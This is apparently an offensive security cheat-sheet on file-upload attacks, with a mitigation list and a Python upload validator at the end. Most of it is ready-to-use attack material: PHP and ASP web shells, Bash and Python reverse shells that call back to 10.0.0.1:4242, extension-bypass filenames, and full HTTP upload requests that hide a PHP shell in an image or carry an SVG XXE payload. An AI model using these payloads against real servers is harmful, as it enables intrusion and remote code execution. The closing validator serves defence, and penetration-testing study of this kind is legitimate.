File Uploads

Ways to upload files to a server for backdoor or RCE purposes

Basic Webshell Uploads

PHP RCE

<?php system('hostname'); ?>

PHP Webshell

<?php system($_REQUEST['cmd']); ?>

ASP Web Shell

<% eval request('cmd') %>

Basic Reverse shells

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Python3

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Extension Bypassing

Uncommon extensions (can be fuzzed)

shell.phtml

Case Manipulation

shell.pHp

Double Extension / Reverse Double Extension

shell.jpg.php
shell.php.jpg

Shells in Images

Create an empty image with

$ convert -size 32x32 xc:white empty.jpg

Upload the image and intercept the request with Burp Suite. Append the shell at the end of the file body.

POST /contact/upload.php HTTP/1.1
Host: 104.248.172.48:30240
Content-Type: multipart/form-data; boundary=---------------------------408734665627640234072772191326
Content-Length: 434
Origin: http://104.248.172.48:30240
Connection: close
Referer: http://104.248.172.48:30240/contact/

-----------------------------408734665627640234072772191326
Content-Disposition: form-data; name="uploadFile"; filename="empty.phar.jpg"
Content-Type: image/jpg

...(image gibberish)
<?php echo system($_REQUEST['cmd']);?>

-----------------------------408734665627640234072772191326--

Checks are typically done on

  • Extension names

  • Content types

  • Mime types

Play around with those to find a bypass.

SVG files and XXE

An SVG file is XML, so an upload that is parsed server-side can be chained with an XXE vulnerability.

POST /contact/upload.php HTTP/1.1
Host: 104.248.172.48:30240
Content-Type: multipart/form-data; boundary=---------------------------408734665627640234072772191326
Content-Length: 390
Origin: http://104.248.172.48:30240
Connection: close
Referer: http://104.248.172.48:30240/contact/

-----------------------------408734665627640234072772191326
Content-Disposition: form-data; name="uploadFile"; filename="empty.phar.svg"
Content-Type: image/svg

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

-----------------------------408734665627640234072772191326--

Mitigations

  • Extension Validation

  • Content Type Validation

  • Mime Type Validation

  • Prevent upload path disclosure
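The four mitigations above, applied together in one validator. This is an added example, not code from the original page; the allow-lists, signatures and function names are assumptions for an image-only upload endpoint. It refuses every bypass shown earlier (case changes, double extensions, a PHP tag appended to an image, an SVG carrying a DOCTYPE) and stores accepted files under a random name so the original name and path are never echoed back.

```python
import re
import secrets

# Constructed allow-lists for an image-only upload endpoint (an assumption, not the page's config)
ALLOWED_CT = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png",
              "gif": "image/gif", "svg": "image/svg+xml"}
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)      # catches <?php, <?=, "<? "
XML_DANGER = re.compile(rb"<!DOCTYPE|<!ENTITY|<script", re.IGNORECASE)


def validate_upload(filename: str, content_type: str, data: bytes) -> list:
    """Return the list of failed checks; an empty list means the upload is accepted."""
    failed = []
    parts = filename.lower().split(".")
    # Extension: lower-case the name and require exactly one extension, so
    # shell.pHp, shell.phtml, shell.jpg.php, shell.php.jpg and empty.phar.jpg all fail here
    ext = parts[1] if len(parts) == 2 and parts[0] else None
    if ext is None:
        failed.append("extension: need exactly one extension (name.ext)")
    elif ext not in ALLOWED_CT:
        failed.append(f"extension: .{ext} is not on the allow-list")
    # Content-Type: must be the one registered for that extension (image/jpg is not image/jpeg)
    if ext in ALLOWED_CT and content_type.lower() != ALLOWED_CT[ext]:
        failed.append(f"content-type: {content_type} does not match .{ext}")
    # Magic bytes: the body must start with the signature of the type it claims to be
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        failed.append("mime: body does not start with the expected image signature")
    # Polyglot: an image with a PHP tag appended is still dangerous if the upload
    # directory is ever executed as PHP, so refuse it regardless of the name
    if PHP_TAG.search(data):
        failed.append("content: embedded PHP tag")
    # SVG is XML: reject DOCTYPE/ENTITY/script so XXE never reaches the XML parser
    if ext == "svg" and XML_DANGER.search(data):
        failed.append("content: SVG with DOCTYPE/ENTITY/script")
    return failed


def storage_name(filename: str) -> str:
    """Store under a random name with the validated extension so the original
    name (and therefore the upload path) is never reflected back to the client."""
    ext = filename.lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{ext}"
```

Call `validate_upload` on the raw multipart part before writing anything to disk, and only then derive the on-disk name with `storage_name`.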
